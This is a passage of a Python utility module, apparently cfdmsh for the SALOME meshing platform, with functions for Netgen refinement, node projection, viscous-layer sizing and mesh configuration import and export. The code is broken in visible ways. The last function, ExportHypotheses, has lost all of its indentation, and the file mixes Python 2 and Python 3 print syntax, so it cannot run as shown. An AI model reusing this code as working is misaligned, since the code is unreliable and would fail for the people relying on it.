					refinement_edge = salome.myStudy.FindObjectID(study_object_id).GetObject()
					refinement_edges.append(refinement_edge)
		#-
		# Clear the netgen hypo
		if clear == True:
			try:
				local_sizes = hypo.GetLocalSizeEntries()
				for local_size in local_sizes: hypo.UnsetLocalSizeOnEntry(local_size)
			except: pass
		#-
		# Set the new refinement size
		for refinement_edge in refinement_edges:
			hypo.SetLocalSizeOnShape(refinement_edge, size)
		#-
snr = SetNetgenRefinement# Short alias (cfdmsh abbreviation convention).
def ClearNetgenRefinement( hypo = None ):
	"""
	Description:
		Cancels all Netgen refinements.
	Arguments:
		# hypo
			Description: The Netgen hypothesis to clean.
			Type: Mesh hypothesis
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		-
	"""
	# Resolve the input object (GUI selection or name lookup).
	hypo = GetGUISelection(hypo)
	hypo = GetObject(hypo, "NETGENPlugin")
	#-
	# Recurse when several hypotheses were given.
	if isinstance(hypo, list):
		for one_hypo in hypo:
			ClearNetgenRefinement(one_hypo)
		return
	#-
	# Nothing to do when the object could not be resolved.
	if hypo in ["error", None]: return
	#-
	# The object must be a Netgen hypothesis...
	if str(hypo)[1:45] != "NETGENPlugin._objref_NETGENPlugin_Hypothesis":
		print("[X] The input object is incorrect or the Mesh module was not yet loaded.")
		return
	# ... of the "1D - 2D" or "1D - 2D - 3D" kind.
	if str(hypo.GetName()) not in ["NETGEN_Parameters_2D", "NETGEN_Parameters"]:
		print("[X] The selected hypothesis is not a Netgen 1D - 2D or Netgen 1D - 2D - 3D hypothesis.")
		return
	#-
	# Drop every local size entry carried by the hypothesis.
	try:
		for entry in hypo.GetLocalSizeEntries():
			hypo.UnsetLocalSizeOnEntry(entry)
	except: pass
cnr = ClearNetgenRefinement# Short alias (cfdmsh abbreviation convention).
def ProjectMeshGroupOnFace( group_and_face = [None] ):
	"""
	Description:
		Moves nodes of a Mesh Group by projecting them on a Face defined in the Geometry module.
	Arguments:
		# group_and_face
			Description: The group to project and the target face.
			Type: List of 1 Mesh Group + 1 Face
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: [None]
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		-
	"""
	# Get the input shape(s)
	group_and_face = GetGUISelection(group_and_face)
	group_and_face = GetObject(group_and_face, "GEOM", silent = True) + GetObject(group_and_face, "SMESH", silent = True)
	#-
	# Sort the selection into one mesh group and one single-face geometry.
	mesh_group = None
	target_face = None
	for candidate in group_and_face:
		candidate_string = str(candidate)
		if "SMESH._objref_SMESH_Group" in candidate_string:
			mesh_group = candidate
		if "GEOM._objref_GEOM_Object" in candidate_string:
			# Only keep geometrical objects made of exactly one face.
			nb_faces = int(geompy.WhatIs(candidate).split("\n")[3].split(": ")[1])
			if nb_faces == 1:
				target_face = candidate
	if mesh_group == None or target_face == None:
		print("[X] A node group and a face should be selected.")
		return
	#-
	# Wrap the underlying mesh so GetNodeXYZ / MoveNode are available.
	wrapped_mesh = smesh.Mesh(mesh_group.GetMesh())
	#-
	# Project every node of the group onto the face and move it there.
	for node_id in mesh_group.GetNodeIDs():
		[x, y, z] = wrapped_mesh.GetNodeXYZ(node_id)
		projection = geompy.MakeProjection(geompy.MakeVertex(x, y, z), target_face)
		[new_x, new_y, new_z] = geompy.PointCoordinates(projection)
		wrapped_mesh.MoveNode(node_id, new_x, new_y, new_z)
	#-
pmgof = ProjectMeshGroupOnFace# Short alias (cfdmsh abbreviation convention).
def MakeVertexesFromMeshGroup( group = None, add = True ):
	"""
	Description:
		Creates a compound of vertexes from a mesh group.
	Arguments:
		# group
			Description: The group from which to create vertexes.
			Type: Mesh Group
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# add
			Description: See here.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: Compound of Vertexes
		Number: 1
		Name: "VertexesFromMeshGroup"
	Conditions of use:
		-
	"""
	# Get the input shape(s)
	group = GetGUISelection(group)
	group = GetObject(group, "SMESH")
	#-
	# Make this function recursive
	if isinstance(group, list):
		return_list = []
		for sub_object in group:
			return_list.append(MakeVertexesFromMeshGroup(sub_object, add))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [group] or None in [group]: return
	#-
	else:
		# Get the group mesh
		group_mesh = group.GetMesh()
		#-
		# Get the node Ids
		# The accessor name differs between group kinds, so both are tried.
		# NOTE(review): GetNodeIDs vs GetNodesId — presumably standalone vs
		# geometry-based groups; confirm against the SMESH API.
		try:
			group_nodes_ids = group.GetNodeIDs()
		except:
			group_nodes_ids = group.GetNodesId()
		#-
		# Create the vertexes (one GEOM vertex per mesh node)
		vertexes = []
		for group_node_id in group_nodes_ids:
			[x, y, z] = group_mesh.GetNodeXYZ(group_node_id)
			vertex = geompy.MakeVertex(x, y, z)
			vertexes.append(vertex)
		#-
		# Put the vertexes in a compound
		vertex_compound = geompy.MakeCompound(vertexes)
		#-
		# Add and return the resulting shape(s)
		if add == True:
			AddToStudy(vertex_compound, "VertexesFromMeshGroup")
		return vertex_compound
		#-
mvfmg = MakeVertexesFromMeshGroup# Short alias (cfdmsh abbreviation convention).
def RotateFlapGenerateAndExportMeshInAmshFormat( angles, group_file = "cfdmsh_grps", mesh_file = "cfdmsh_msh", domain = "domain", fixed_edges = "fixed_edges", rotating_face = "rotating_face", rotating_edges = "rotating_edges", flap_axis = "flap_axis", keep_mesh = True, help = False ):
	"""
	Description:
		Rotates a flap, generates a mesh and exports it into an .amsh file readable with Edge 5.0.0.
	Arguments:
		# angles
			Description: The list of flap angles to compute
			Type: List of Floats
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: -
		# group_file
			Description: The name of the group file to import in the final partitions.
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "cfdmsh_grps"
		# mesh_file
			Description: The name of the mesh file to import in the meshes.
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "cfdmsh_msh"
		# domain
			Description: The face describing the domain before cutting the flap face.
			Type: Face
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: "domain"
		# fixed_edges
			Description: The compound of edges which won't move with the flap.
			Type: Compound of Edges
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: "fixed_edges"
		# rotating_face
			Description: The face describing the flap.
			Type: Face
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: "rotating_face"
		# rotating_edges
			Description: The compound of edges which move with the flap.
			Type: Compound of Edges
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: "rotating_edges"
		# flap_axis
			Description: The axis of the flap rotation.
			Type: Edge
			GUI selection: -
			Selection by name: yes
			Recursive: -
			Default value: "flap_axis"
		# keep_mesh
			Description: If equals True, meshes are not cleared after each mesh export.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: True
		# help
			Description: This argument is passed to the ExportAmshFile function.
			Type: Boolean
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: False
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		To use this function, the group file and mesh file have to be previously generated manually and the hypotheses to be used in the mesh have to be present in the study.
	"""
	import math# Local import: only needed for the degree -> radian conversion below.
	# Get the input shape(s)
	[domain, fixed_edges, rotating_face, rotating_edges, flap_axis] = GetObject([domain, fixed_edges, rotating_face, rotating_edges, flap_axis], "GEOM")
	#-
	# Check the input shape existence
	if "error" in [domain, fixed_edges, rotating_face, rotating_edges, flap_axis]:
		return
	#-
	else:
		for angle in angles:# For each rotation angle...
			# Convert angle from degrees to radians
			# (math.radians replaces the truncated 3.141592654 constant formerly used here).
			angle_in_radians = math.radians(angle)
			#-
			# Rotate the flap
			rotated_flap_face = geompy.MakeRotation(rotating_face, flap_axis, angle_in_radians)
			rotated_flap_edges = geompy.MakeRotation(rotating_edges, flap_axis, angle_in_radians)
			#-
			# Cut and partition the domain
			cut_domain = geompy.MakeCut(domain, rotated_flap_face)
			partition = geompy.MakePartition([cut_domain], [rotated_flap_edges, fixed_edges], Limit = geompy.ShapeType["FACE"])
			#-
			# Import the geometrical groups
			partition_name = "Partition_" + str(angle) + "deg"
			geompy.addToStudy(partition, partition_name)
			ImportGeometricalGroups(partition_name, group_file)
			#-
			# Create the mesh
			mesh_name = "Mesh_" + str(angle) + "deg"
			mesh = smesh.Mesh(partition, mesh_name)
			#-
			# Import the mesh configuration
			ImportMeshConfiguration(mesh, mesh_file)
			#-
			# Compute the mesh
			mesh.Compute()
			#-
			# Export the mesh
			ExportAmshFile(mesh, mesh_name, help = help)
			#-
			# Drop the computed elements when the mesh is not to be kept.
			if keep_mesh == False:
				mesh.Clear()
rfgaemiaf = RotateFlapGenerateAndExportMeshInAmshFormat# Short alias (cfdmsh abbreviation convention).
def ViscousLayerScaleFactor( total_thick, wall_thick, ratio = 1.2 ):
	"""
	Description:
		Calculates the parameters to use in a "Nb. Segment" hypothesis from common viscous layers parameters (total thickness, wall thickness and a ratio).
	Arguments:
		# total_thick
			Description: The viscous layer total thickness.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: -
		# wall_thick
			Description: The desired thickness of the layer touching the wall.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: -
		# ratio
			Description: The desired ratio between each layer n and n+1.
			Type: Float
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: 1.2
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: Float
		Number: 2
		Name: -
	Conditions of use:
		-
	"""
	# Accumulate the geometric layer thicknesses (wall_thick * ratio**i) one by one
	# until the cumulated thickness exceeds the requested total thickness.
	# (Replaces the former version which pre-built two 1001-element lists and
	# crashed with a NameError when the total thickness was never reached.)
	nb_layers = 0
	layer_thickness = wall_thick
	cumulated_thickness = 0.0
	while nb_layers < 1001:# Same hard cap as the historical implementation.
		cumulated_thickness += layer_thickness
		nb_layers += 1
		if cumulated_thickness > total_thick:
			break
		layer_thickness *= ratio
	else:
		raise ValueError("ViscousLayerScaleFactor: the total thickness cannot be reached within 1001 layers.")
	#-
	# Scale between the first and the last layer (equals ratio**(nb_layers - 1)).
	scale = layer_thickness / wall_thick
	#-
	# Print the number of layers and scale
	print("Number of Segments = \t%i"%(nb_layers))
	print("Scale Factor = \t%.5f"%(scale))
	#-
	return [nb_layers, scale]
vlsf = ViscousLayerScaleFactor# Short alias (cfdmsh abbreviation convention).
def ExportMeshConfiguration( mesh = None, file = "cfdmsh_msh" ):
	"""
	Description:
		Exports into a file the name of the algorithms, hypotheses and groups associated to a mesh and its sub-meshes.
	Arguments:
		# mesh
			Description: The source mesh.
			Type: Mesh
			GUI selection: yes
			Selection by name: yes
			Recursive: -
			Default value: None
		# file
			Description: The name of the file to write.
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "cfdmsh_msh"
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		All the hypotheses and algorithms used by the mesh and its sub-meshes must have a different name. Also, the names of all mesh groups have to be the same as the names of their associated geometrical groups.
	"""
	# NOTE(review): the "file" parameter shadows the Python 2 builtin of the same
	# name; kept unchanged for backward compatibility of the public signature.
	# Get the input shape(s)
	mesh = GetGUISelection(mesh, uniq = True)
	mesh = GetObject(mesh, "SMESH")
	#-
	# Check the input shape existence
	if "error" in [mesh] or None in [mesh]: return
	#-
	else:# All checks done
		if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
			# Wrap the raw SMESH object into a smesh.Mesh helper when possible.
			try:
				mesh = smesh.Mesh(mesh)
			except:
				pass
		else:
			print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
		#-
		# Open the hypothesis file
		hypothesis_file = open(file, "w")
		#-
		# Get the mesh shape
		mesh_shape = mesh.GetShape()
		mesh_shape_name = mesh_shape.GetName()# NOTE(review): currently unused.
		#-
		# Get the shape hypotheses
		shape_hypotheses = mesh.GetHypothesisList(mesh_shape)
		#-
		# Check if hypotheses are associated to the mesh shape
		nb_shape_hypotheses = len(shape_hypotheses)
		#-
		if nb_shape_hypotheses > 0:# If so...
			# Write the shape flag
			hypothesis_file.write("SHAPE:\n")
			#-
			for shape_hypothesis in shape_hypotheses:# For each shape hypothesis...
				# Get the hypothesis name
				shape_hypothesis_name = smeshBuilder.GetName(shape_hypothesis)
				#-
				# Write the hypothesis
				hypothesis_file.write("%s\n"%(shape_hypothesis_name))
				#-
		# Get the shape groups
		mesh_shape_groups = geompy.GetGroups(mesh_shape)
		#-
		for group in mesh_shape_groups:# For each group...
			# Get the group name
			group_name = group.GetName()
			#-
			# Get the hypothesis list
			group_hypotheses = mesh.GetHypothesisList(group)
			#-
			# Check if hypotheses are associated to the group
			nb_group_hypotheses = len(group_hypotheses)
			#-
			if nb_group_hypotheses > 0:# If so...
				# Write the group name
				hypothesis_file.write("SUBMESH:%s\n"%(group_name))
				#-
				for group_hypothesis in group_hypotheses:# For each hypothesis...
					# Get the hypothesis name
					group_hypothesis_name = smeshBuilder.GetName(group_hypothesis)
					#-
					# Write the hypothesis
					hypothesis_file.write("%s\n"%(group_hypothesis_name))
					#-
		# Get the mesh groups
		mesh_groups = mesh.GetGroups()
		#-
		# Check if there are mesh groups
		nb_mesh_groups = len(mesh_groups)
		#-
		if nb_mesh_groups > 0:# If so...
			# Write the group flag
			hypothesis_file.write("GROUPS:")
			#-
			for mesh_group in mesh_groups:# For each mesh group...
				# Get the mesh group name
				mesh_group_name = mesh_group.GetName()
				#-
				# Write the mesh group name (tab-separated, on a single line)
				hypothesis_file.write("%s\t"%(mesh_group_name))
				#-
		# Close hypothesis file
		hypothesis_file.close()
		#-
emc = ExportMeshConfiguration# Short alias (cfdmsh abbreviation convention).
def ImportMeshConfiguration( mesh = None, file = "cfdmsh_msh" ):
	"""
	Description:
		Imports into a mesh algorithms, hypotheses and group names from a file created with the ExportMeshConfiguration function.
	Arguments:
		# mesh
			Description: The target mesh.
			Type: Mesh
			GUI selection: yes
			Selection by name: yes
			Recursive: yes
			Default value: None
		# file
			Description: Name of the file to read.
			Type: String
			GUI selection: -
			Selection by name: -
			Recursive: -
			Default value: "cfdmsh_msh"
	Returned Values:
		"dim" value: -
		"single" value: -
		Type: -
		Number: -
		Name: -
	Conditions of use:
		All the hypotheses and algorithms present in the file has to be also present in the study. Also, there must be, in the geometrical object associated to the target mesh, groups having the same name as the groups present in the file.
	"""
	# Get the input shape(s)
	mesh = GetGUISelection(mesh, uniq = True)
	mesh = GetObject(mesh, "SMESH")
	#-
	# Make this function recursive
	if isinstance(mesh, list):
		return_list = []
		for sub_object in mesh:
			return_list.append(ImportMeshConfiguration(sub_object, file))
		return return_list
	#-
	# Check the input shape existence
	if "error" in [mesh] or None in [mesh]: return
	#-
	else:# All checks done
		if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
			# Wrap the raw SMESH object into a smesh.Mesh helper when possible.
			try:
				mesh = smesh.Mesh(mesh)
			except:
				pass
		else:
			print("[X] The input object is not a mesh or the Mesh module was not yet loaded."); return
		# Get the mesh shape
		mesh_shape = mesh.GetShape()
		#-
		# Get the mesh groups
		shape_groups = geompy.GetGroups(mesh_shape)
		shape_group_names = [group.GetName() for group in shape_groups]
		nb_shape_groups = len(shape_groups)
		#-
		# Open the hypothesis file
		hypothesis_file = open(file, "r")
		#-
		# Read the file
		# The file alternates flag lines ("SHAPE:", "SUBMESH:<name>", "GROUPS:<names>")
		# and hypothesis-name lines; "group" tracks the geometry the following
		# hypotheses apply to (None meaning the main shape).
		# NOTE(review): a hypothesis line appearing before any SHAPE/SUBMESH flag
		# would raise a NameError on "group" — assumed never produced by
		# ExportMeshConfiguration; confirm if files are edited by hand.
		for line in hypothesis_file:# For each line in the hypothesis file...
			is_a_sub_mesh_line = (line.find("SUBMESH:") == 0)
			is_a_shape_line = (line.find("SHAPE:") == 0)
			is_a_group_line = (line.find("GROUPS:") == 0)
			if is_a_shape_line == True:# If it is a "shape" line...
				group = None
			elif is_a_sub_mesh_line == True:# If it is a "submesh" line...
				# Get the group name (strip the flag and the trailing newline)
				group_name = line[8: - 1]
				#-
				# Get the group
				for i in range(nb_shape_groups):# For all groups in the shape...
					if group_name == shape_group_names[i]:# Compare their name with the one from the file...
						group = shape_groups[i]# If matched, extract the group in the shape group list
						break
				#-
				# Create a submesh associated to this group
				mesh.GetSubMesh(group, group_name)
				#
			elif is_a_group_line == True:
				# Get the group names (tab-separated after the flag)
				group_names = line[7: - 1]
				group_names = group_names.split("\t")
				#-
				for group_name in group_names:# For each group name...
					# Get the shape group
					shape_group = None
					for i in range(nb_shape_groups):# For all groups in the shape...
						if group_name == shape_group_names[i]:# Compare their name with the one from the file...
							shape_group = shape_groups[i]# If matched, extract the group in the shape group list
							break
					#-
					# Create the mesh group
					mesh_group = mesh.GroupOnGeom(shape_group)
					#-
				#-
			else:# If it is a hypothesis line...
				# Get the hypothesis name
				hypothesis_name = line[:-1]
				#-
				# Get the hypothesis
				try:# Look in the hypotheses...
					hypothesis = salome.myStudy.FindObjectByPath("/Mesh/Hypotheses/%s"%(hypothesis_name)).GetObject()
				except AttributeError:# Else, in the algorithms...
					hypothesis = salome.myStudy.FindObjectByPath("/Mesh/Algorithms/%s"%(hypothesis_name)).GetObject()
				#-
				# Add the hypothesis to the mesh
				mesh.AddHypothesis(hypothesis, group)
				#-
			#-
		# Update the study tree
		salome.sg.updateObjBrowser(1)
		#-
		# Close hypothesis file
		hypothesis_file.close()
		#-
imc = ImportMeshConfiguration# Short alias (cfdmsh abbreviation convention).
def ExportHypotheses( hypo = [None], file = "cfdmsh_hps" ):
"""
Description:
Exports hypotheses into a text file mesh.
Arguments:
# hypo
Description: The list of hypotheses to export.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: [None]
# file
Description: The name of the file to write.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "cfdmsh_hps"
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
-
"""
# Get the input shape(s)
hypo = GetGUISelection(hypo)
hypo = GetObject(hypo, "SMESH")
#-
# Check the input shape existence
if "error" in hypo or None in hypo: return
#-
else:# All checks done
# Open the hypothesis file
hypothesis_file = open(file, "w")
#-
for hypothesis in hypo:
# Get the hypothesis name
hypothesis_name = smeshBuilder.GetName(hypothesis)
#-
# Get the hypothesis type
hypothesis_type = hypothesis.GetName()
#-
# Add the hypothesis to the hypothesis file
hypothesis_file.write("TYPE:\n%s\n"%(hypothesis_type))
hypothesis_file.write("NAME:\n%s\n"%(hypothesis_name))
#-
# Add the hypothesis parameters to the hypothesis file
if hypothesis_type == "SegmentLengthAroundVertex":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
if hypothesis_type == "LocalLength":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
hypothesis_file.write("PRECISION:\n%s\n"%(hypothesis.GetPrecision()))
if hypothesis_type == "MaxLength":
hypothesis_file.write("LENGTH:\n%s\n"%(hypothesis.GetLength()))
hypothesis_file.write("PRESSTIMATEDLENGTH:\n%s\n"%(hypothesis.GetPreestimatedLength()))
hypothesis_file.write("USEPRESSTIMATEDLENGTH:\n%s\n"%(hypothesis.GetUsePreestimatedLength()))
if hypothesis_type == "Arithmetic1D":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetLength(1)))
hypothesis_file.write("ENDLENGTH:\n%s\n"%(hypothesis.GetLength(0)))
if hypothesis_type == "GeometricProgression":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetStartLength()))
hypothesis_file.write("COMMONRATIO:\n%s\n"%(hypothesis.GetCommonRatio()))
if hypothesis_type == "FixedPoints1D":
hypothesis_file.write("NBSEGMENTS:\n%s\n"%(hypothesis.GetNbSegments()))
hypothesis_file.write("POINTS:\n%s\n"%(hypothesis.GetPoints()))
if hypothesis_type == "StartEndLength":
hypothesis_file.write("STARTLENGTH:\n%s\n"%(hypothesis.GetLength(1)))
hypothesis_file.write("ENDLENGTH:\n%s\n"%(hypothesis.GetLength(0)))
if hypothesis_type == "NumberOfSegments":
hypothesis_file.write("NUMBEROFSEGMENTS:\n%s\n"%(hypothesis.GetNumberOfSegments()))
hypothesis_file.write("DISTRTYPE:\n%s\n"%(hypothesis.GetDistrType()))
try: hypothesis_file.write("SCALEFACTOR:\n%s\n"%(hypothesis.GetScaleFactor()))
except: pass
try: hypothesis_file.write("TABLEFUNCTION:\n%s\n"%(hypothesis.GetTableFunction()))
except: pass
try: hypothesis_file.write("EXPRESSIONFUNCTION:\n%s\n"%(hypothesis.GetExpressionFunction()))
except: pass
hypothesis_file.write("CONVERSIONMODE:\n%s\n"%(hypothesis.ConversionMode()))
if hypothesis_type == "Deflection1D":
hypothesis_file.write("DEFLECTION:\n%s\n"%(hypothesis.GetDeflection()))
if hypothesis_type == "Adaptive1D":
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("DEFLECTION:\n%s\n"%(hypothesis.GetDeflection()))
if hypothesis_type == "AutomaticLength":
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
if hypothesis_type == "LengthFromEdges":
pass
if hypothesis_type == "MaxElementArea":
hypothesis_file.write("MAXELEMENTAREA:\n%s\n"%(hypothesis.GetMaxElementArea()))
if hypothesis_type == "QuadrangleParams":
hypothesis_file.write("QUADTYPE:\n%s\n"%(hypothesis.GetQuadType()))
if hypothesis_type == "NumberOfLayers2D":
hypothesis_file.write("NUMBEROFLAYERS:\n%s\n"%(hypothesis.GetNumberOfLayers()))
if hypothesis_type == "NETGEN_Parameters_2D_ONLY" or hypothesis_type == "NETGEN_Parameters_3D":
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
hypothesis_file.write("GROWTHRATE:\n%s\n"%(hypothesis.GetGrowthRate()))
hypothesis_file.write("USESURFACECURVATURE:\n%s\n"%(hypothesis.GetUseSurfaceCurvature()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIMIZE:\n%s\n"%(hypothesis.GetOptimize()))
if hypothesis_type == "NETGEN_Parameters_2D" or hypothesis_type == "NETGEN_Parameters":# 3D
hypothesis_file.write("FINENESS:\n%s\n"%(hypothesis.GetFineness()))
hypothesis_file.write("GROWTHRATE:\n%s\n"%(hypothesis.GetGrowthRate()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("SECONDORDER:\n%s\n"%(hypothesis.GetSecondOrder()))
hypothesis_file.write("NBSEGPEREDGE:\n%s\n"%(hypothesis.GetNbSegPerEdge()))
hypothesis_file.write("NBSEGPERRADIUS:\n%s\n"%(hypothesis.GetNbSegPerRadius()))
hypothesis_file.write("USESURFACECURVATURE:\n%s\n"%(hypothesis.GetUseSurfaceCurvature()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIMIZE:\n%s\n"%(hypothesis.GetOptimize()))
hypothesis_file.write("FUSEEDGES:\n%s\n"%(hypothesis.GetFuseEdges()))
if hypothesis_type == "NETGEN_SimpleParameters_2D" or hypothesis_type == "NETGEN_SimpleParameters_3D":
hypothesis_file.write("NUMBEROFSEGMENTS:\n%s\n"%(hypothesis.GetNumberOfSegments()))
hypothesis_file.write("LOCALLENGTH:\n%s\n"%(hypothesis.GetLocalLength()))
hypothesis_file.write("MAXELEMENTAREA:\n%s\n"%(hypothesis.GetMaxElementArea()))
hypothesis_file.write("ALLOWQUADRANGLES:\n%s\n"%(hypothesis.GetAllowQuadrangles()))
if hypothesis_type == "MG - CADSurf Parameters":
hypothesis_file.write("PHYSICALMESH:\n%s\n"%(hypothesis.GetPhysicalMesh()))
hypothesis_file.write("GEOMETRICMESH:\n%s\n"%(hypothesis.GetGeometricMesh()))
hypothesis_file.write("ANGLEMESH:\n%s\n"%(hypothesis.GetAngleMesh()))
hypothesis_file.write("CHORDALERROR:\n%s\n"%(hypothesis.GetChordalError()))
hypothesis_file.write("PHYSIZE:\n%s\n"%(hypothesis.GetPhySize()))
hypothesis_file.write("ISPHYSIZEREL:\n%s\n"%(hypothesis.IsPhySizeRel()))
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("ISMINSIZEREL:\n%s\n"%(hypothesis.IsMinSizeRel()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("ISMAXSIZEREL:\n%s\n"%(hypothesis.IsMaxSizeRel()))
hypothesis_file.write("QUADRATICMESH:\n%s\n"%(hypothesis.GetQuadraticMesh()))
hypothesis_file.write("GRADATION:\n%s\n"%(hypothesis.GetGradation()))
hypothesis_file.write("ANISOTROPIC:\n%s\n"%(hypothesis.GetAnisotropic()))
hypothesis_file.write("ANISOTROPICRATIO:\n%s\n"%(hypothesis.GetAnisotropicRatio()))
hypothesis_file.write("REMOVETINYEDGES:\n%s\n"%(hypothesis.GetRemoveTinyEdges()))
hypothesis_file.write("TINYEDGELENGTH:\n%s\n"%(hypothesis.GetTinyEdgeLength()))
hypothesis_file.write("BADELEMENTREMOVAL:\n%s\n"%(hypothesis.GetBadElementRemoval()))
hypothesis_file.write("BADELEMENTASPECTRATIO:\n%s\n"%(hypothesis.GetBadElementAspectRatio()))
hypothesis_file.write("OPTIMIZEMESH:\n%s\n"%(hypothesis.GetOptimizeMesh()))
hypothesis_file.write("QUADALLOWED:\n%s\n"%(hypothesis.GetQuadAllowed()))
hypothesis_file.write("OPTIONVALUES:\n%s\n"%(hypothesis.GetOptionValues()))
hypothesis_file.write("PRECADOPTIONVALUES:\n%s\n"%(hypothesis.GetPreCADOptionValues()))
hypothesis_file.write("TOPOLOGY:\n%s\n"%(hypothesis.GetTopology()))# int
hypothesis_file.write("PRECADMERGEEDGES:\n%s\n"%(hypothesis.GetPreCADMergeEdges()))
hypothesis_file.write("PRECADPROCESS3DTOPOLOGY:\n%s\n"%(hypothesis.GetPreCADProcess3DTopology()))
hypothesis_file.write("PRECADDISCARDINPUT:\n%s\n"%(hypothesis.GetPreCADDiscardInput()))
hypothesis_file.write("VERBOSITY:\n%s\n"%(hypothesis.GetVerbosity()))
hypothesis_file.write("GMFFILE:\n%s\n"%(hypothesis.GetGMFFile()))
if hypothesis_type == "ViscousLayers2D":
hypothesis_file.write("NUMBERLAYERS:\n%s\n"%(hypothesis.GetNumberLayers()))
hypothesis_file.write("STRETCHFACTOR:\n%s\n"%(hypothesis.GetStretchFactor()))
hypothesis_file.write("TOTALTHICKNESS:\n%s\n"%(hypothesis.GetTotalThickness()))
if hypothesis_type == "NumberOfLayers":# 3D
hypothesis_file.write("NUMBEROFLAYERS:\n%s\n"%(hypothesis.GetNumberOfLayers()))
if hypothesis_type == "MaxElementVolume":
hypothesis_file.write("MAXELEMENTVOLUME:\n%s\n"%(hypothesis.GetMaxElementVolume()))
if hypothesis_type == "NETGEN_SimpleParameters_3D":
hypothesis_file.write("MAXELEMENTVOLUME:\n%s\n"%(hypothesis.GetMaxElementVolume()))
if hypothesis_type == "MG - Tetra Parallel Parameters":
hypothesis_file.write("MEDNAME:\n%s\n"%(hypothesis.GetMEDName()))
hypothesis_file.write("NBPART:\n%s\n"%(hypothesis.GetNbPart()))
hypothesis_file.write("KEEPFILES:\n%s\n"%(hypothesis.GetKeepFiles()))
hypothesis_file.write("BACKGROUND:\n%s\n"%(hypothesis.GetBackground()))
hypothesis_file.write("MERGESUBDOMAINS:\n%s\n"%(hypothesis.GetToMergeSubdomains()))
hypothesis_file.write("TAGSUBDOMAINS:\n%s\n"%(hypothesis.GetToTagSubdomains()))
hypothesis_file.write("OUTPUTINTERFACES:\n%s\n"%(hypothesis.GetToOutputInterfaces()))
hypothesis_file.write("DISCARDSUBDOMAINS:\n%s\n"%(hypothesis.GetToDiscardSubdomains()))
if hypothesis_type == "MG - Hexa Parameters":
hypothesis_file.write("MINSIZE:\n%s\n"%(hypothesis.GetMinSize()))
hypothesis_file.write("MAXSIZE:\n%s\n"%(hypothesis.GetMaxSize()))
hypothesis_file.write("HEXESMINLEVEL:\n%s\n"%(hypothesis.GetHexesMinLevel()))
hypothesis_file.write("HEXESMAXLEVEL:\n%s\n"%(hypothesis.GetHexesMaxLevel()))
hypothesis_file.write("HEXOTICIGNORERIDGES:\n%s\n"%(hypothesis.GetHexoticIgnoreRidges()))
hypothesis_file.write("HEXOTICINVALIDELEMENTS:\n%s\n"%(hypothesis.GetHexoticInvalidElements()))
hypothesis_file.write("HEXOTICSHARPANGLETHRESHOLD:\n%s\n"%(hypothesis.GetHexoticSharpAngleThreshold()))
hypothesis_file.write("HEXOTICNBPROC:\n%s\n"%(hypothesis.GetHexoticNbProc()))
hypothesis_file.write("HEXOTICWORKINGDIRECTORY:\n%s\n"%(hypothesis.GetHexoticWorkingDirectory()))
hypothesis_file.write("HEXOTICMAXMEMORY:\n%s\n"%(hypothesis.GetHexoticMaxMemory()))
